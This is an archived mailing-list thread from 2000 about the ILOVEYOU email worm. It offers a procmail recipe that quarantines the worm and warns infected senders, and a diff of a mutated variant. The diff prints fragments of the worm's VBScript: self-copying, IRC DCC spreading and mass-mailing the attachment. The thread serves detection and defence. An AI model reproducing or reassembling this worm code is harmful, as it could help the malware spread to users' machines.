Procmail recipe now sends an autoack to the sender
Also, the worm downloads a payload from www.skyinet.net [206.101.197.226].
Block port 80 for this IP at your border or firewall.
BTW, the virus has morphed a bit, and a diff of the old and new versions is
below. This recipe is for the old version.
Suresh Ramasubramanian [EMAIL PROTECTED]
# Catch ILOVEYOU email worm and notify sender his computer is infected
:0 D
* ^Subject:\s+ILOVEYOU$
* ^Content-Type:\s+multipart/mixed
{
# EMail notice to infected sender
:0 B c
* name=\"LOVE-LETTER-FOR-YOU.TXT.vbs\"
| (formail -r -A"X-Mailer: procmail"; \
cat /home/sysadmin/mail/ILOVEYOU.txt) \
| $SENDMAIL -oi -t -f [EMAIL PROTECTED]
# Safely stash email worm away
:0 B
* name=\"LOVE-LETTER-FOR-YOU.TXT.vbs\"
/home/sysadmin/mail/I-LOVE-YOU.worm
}
content of I-LOVE-YOU.worm file -
To Whom It May Concern,
An e-mail you sent to a customer of YOUR-COMPANY-NAME-HERE triggered this
virus protection filter on our mail server. There is currently a virus on
the Internet that propagates itself via e-mail. Unfortunately, it appears
that your computer has become infected and is currently e-mailing the
virus to other users in an attempt to infect other computer systems.
Please visit http://www.mcafee.com and download the latest McAfee Virus
Scan software along with the latest DAT files to fix this problem. A free
demo version of the software is available from McAfee.
Additional information on this virus can be found at:
http://news.bbc.co.uk/hi/english/uk/newsid_736000/736080.stm
Sincerely,
YOUR NAME OR COMPANY HERE
hth
-s
--
Suresh Ramasubramanian + President, CAUCE India
http://india.cauce.org + [EMAIL PROTECTED]
--
Even bytes get lonely for a little bit.
>From [EMAIL PROTECTED] Fri May 5 10:53:51 2000
Date: Thu, 4 May 2000 23:23:31 -0400 (EDT)
From: Smeagol Gollum <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: SPAM-L archives -- May 2000, week 1 (#197)
---------- Forwarded message ----------
Date: Thu, 4 May 2000 15:41:09 -0700
From: Andrew Edelstein <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: Re: IL0VEY0U has mutated
On Thu, May 04, 2000 at 03:26:05PM -0700, Andrew Edelstein wrote:
> Heads up: our worm of the day has mutated into a new version:
> Same trojan, only now the subject says "fwd: Joke" and the body is empty.
The
> attached file is named "Very Funny.vbs"
Thought I'd share the love <eg>, since I've already had a couple of people
ask me for it. Here's a diff of the attached file:
bash-2.03$ diff LOVE-LETTER-FOR-YOU.TXT.vbs Very\ Funny.vbs
25c25
< c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
---
> c.Copy(dirsystem&"\Very Funny.vbs")
118c118
< scriptini.WriteLine "n2= /.dcc send $nick
"&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
---
> scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\Very Funny.HTM"
185,187c185,187
< male.Subject = "ILOVEYOU"
< male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
< male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
---
> male.Subject = "fwd: Joke"
> male.Body = vbcrlf&""
> male.Attachments.Add(dirsystem&"\Very Funny.vbs")
266c266
< set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM")
---
> set b=fso.CreateTextFile(dirsystem+"\Very Funny.HTM")
268c268
< set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2)
---
> set d=fso.OpenTextFile(dirsystem+"\Very Funny.HTM",2)
274c274
< end sub
\ No newline at end of file
---
> end sub
And their cksums:
1912960623 10034 LOVE-LETTER-FOR-YOU.TXT.vbs
1550212417 9931 Very Funny.vbs
--
Andrew Edelstein http://andrew.pure-chaos.com
"I'm getting off right now!"
Sarah, 07/24/1999
-----------------------------------------------------------------------
LIH is all for free speech. But it was created for a purpose - to help
people discuss issues about installing and running Linux. If your
messages are counterproductive to this purpose, your privileges to
submit messages can and will be revoked.
